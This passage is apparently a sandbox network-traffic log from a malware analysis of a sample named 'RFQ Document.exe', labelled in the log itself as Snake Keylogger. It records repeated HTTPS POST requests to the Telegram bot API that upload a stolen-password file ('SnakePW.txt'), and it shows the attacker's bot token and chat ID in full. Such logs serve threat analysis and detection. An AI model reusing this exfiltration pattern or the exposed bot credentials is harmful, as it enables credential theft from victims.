2021-09-28 05:59:13 UTC	298	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 31 36 31 35 31 36 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255e1615165Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:13 UTC	298	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:13 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:13 UTC	298	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 37 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 35 33 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12775,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808753,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
187	192.168.2.4	50008	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:13 UTC	299	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255e17defe5 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:13 UTC	299	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 31 37 64 65 66 65 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255e17defe5Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:13 UTC	300	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:13 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:13 UTC	300	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 37 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 35 33 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12776,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808753,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
188	192.168.2.4	50009	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:13 UTC	300	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255e195c4ed Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:13 UTC	301	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 31 39 35 63 34 65 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255e195c4edContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:14 UTC	301	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:14 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:14 UTC	302	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 37 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 35 34 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12778,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808754,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
189	192.168.2.4	50010	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:14 UTC	302	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255e1bbeaa3 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:14 UTC	302	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 31 62 62 65 61 61 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255e1bbeaa3Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:14 UTC	303	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:14 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:14 UTC	303	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 37 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 35 34 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12779,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808754,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
19	192.168.2.4	49793	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:24 UTC	30	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255c414b3f2 Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:24 UTC	30	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 34 31 34 62 33 66 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255c414b3f2Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:24 UTC	30	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:24 GMT Content-Type: application/json Content-Length: 521 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:24 UTC	31	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 35 39 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 34 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12599,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808704,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
190	192.168.2.4	50011	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:14 UTC	304	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255e1d3c50c Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:14 UTC	304	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 31 64 33 63 35 30 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255e1d3c50cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:14 UTC	304	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:14 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:14 UTC	305	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 38 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 35 34 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12780,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808754,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
191	192.168.2.4	50012	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:14 UTC	305	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255e1e937af Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:14 UTC	306	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 31 65 39 33 37 61 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255e1e937afContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:14 UTC	306	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:14 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:14 UTC	306	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 38 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 35 34 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12781,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808754,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
192	192.168.2.4	50013	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:14 UTC	307	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255e20f5e8a Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:14 UTC	307	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 32 30 66 35 65 38 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255e20f5e8aContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
